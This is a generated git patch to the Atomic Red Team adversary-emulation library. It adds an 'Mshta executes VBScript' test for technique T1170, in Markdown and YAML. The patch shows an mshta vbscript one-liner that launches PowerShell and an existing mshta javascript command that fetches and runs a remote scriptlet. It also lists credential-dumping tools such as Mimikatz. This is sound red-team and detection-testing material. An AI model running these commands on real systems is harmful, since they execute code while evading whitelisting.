From 87d70d2ef3d5346487fcd87ee41a6cb4f60f9f84 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Thu, 7 Nov 2019 21:11:20 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/T1170/T1170.md | 25 +++++++++++++++++++++++++
 atomics/index.md | 2 ++
 atomics/index.yaml | 36 ++++++++++++++++++++++++++++++++++++
 atomics/windows-index.md | 2 ++
 4 files changed, 65 insertions(+)
diff --git a/atomics/T1170/T1170.md b/atomics/T1170/T1170.md
index a693c919..6583ade6 100644
--- a/atomics/T1170/T1170.md
+++ b/atomics/T1170/T1170.md
@@ -14,6 +14,8 @@ Mshta.exe can be used to bypass application whitelisting solutions that do not a - [Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject](#atomic-test-1---mshta-executes-javascript-scheme-fetch-remote-payload-with-getobject) +- [Atomic Test #2 - Mshta executes VBScript to execute malicious code](#atomic-test-2---mshta-executes-vbscript-to-execute-malicious-code) +
@@ -35,4 +37,27 @@ mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close(); +
+
+ +## Atomic Test #2 - Mshta executes VBScript to execute malicious code +Run a local VB script to run local user enumeration powershell command + +This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| atomics_path | path to atomics folder | path | ..\..\atomics| + +#### Run it with `command_prompt`! +``` +mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close") +``` + + +
diff --git a/atomics/index.md b/atomics/index.md
index f534c50f..79a24944 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -296,6 +296,7 @@
 - Atomic Test #4: Modify registry to store logon credentials [windows]
 - [T1170 Mshta](./T1170/T1170.md)
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+ - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
 - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -667,6 +668,7 @@
 - Atomic Test #3: Event Monitor Daemon Persistence [macos, centos, ubuntu, linux]
 - [T1170 Mshta](./T1170/T1170.md)
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+ - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
 - Atomic Test #1: Mimikatz [windows]
 - Atomic Test #2: BloodHound [windows]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 549441b3..5ce269b3 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -8827,6 +8827,24 @@ defense-evasion: elevation_required: false command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close(); +' + - name: Mshta executes VBScript to execute malicious code + description: | + Run a local VB script to run local user enumeration powershell command + + This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. + supported_platforms: + - windows + input_arguments: + atomics_path: + description: path to atomics folder + type: path + default: "..\\..\\atomics" + executor: + name: command_prompt + command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell + -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close") + ' T1096: technique: 
@@ -19152,6 +19170,24 @@ execution: elevation_required: false command: 'mshta.exe javascript:a=(GetObject(''script:#{file_url}'')).Exec();close(); +' + - name: Mshta executes VBScript to execute malicious code + description: | + Run a local VB script to run local user enumeration powershell command + + This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. + supported_platforms: + - windows + input_arguments: + atomics_path: + description: path to atomics folder + type: path + default: "..\\..\\atomics" + executor: + name: command_prompt + command: 'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell + -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close") + ' T1086: technique:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 616f245b..677d5a88 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -96,6 +96,7 @@
 - Atomic Test #4: Modify registry to store logon credentials [windows]
 - [T1170 Mshta](./T1170/T1170.md)
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+ - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
 - Atomic Test #1: Alternate Data Streams (ADS) [windows]
 - [T1126 Network Share Connection Removal](./T1126/T1126.md)
@@ -530,6 +531,7 @@
 - T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1170 Mshta](./T1170/T1170.md)
 - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
+ - Atomic Test #2: Mshta executes VBScript to execute malicious code [windows]
 - [T1086 PowerShell](./T1086/T1086.md)
 - Atomic Test #1: Mimikatz [windows]
 - Atomic Test #2: BloodHound [windows]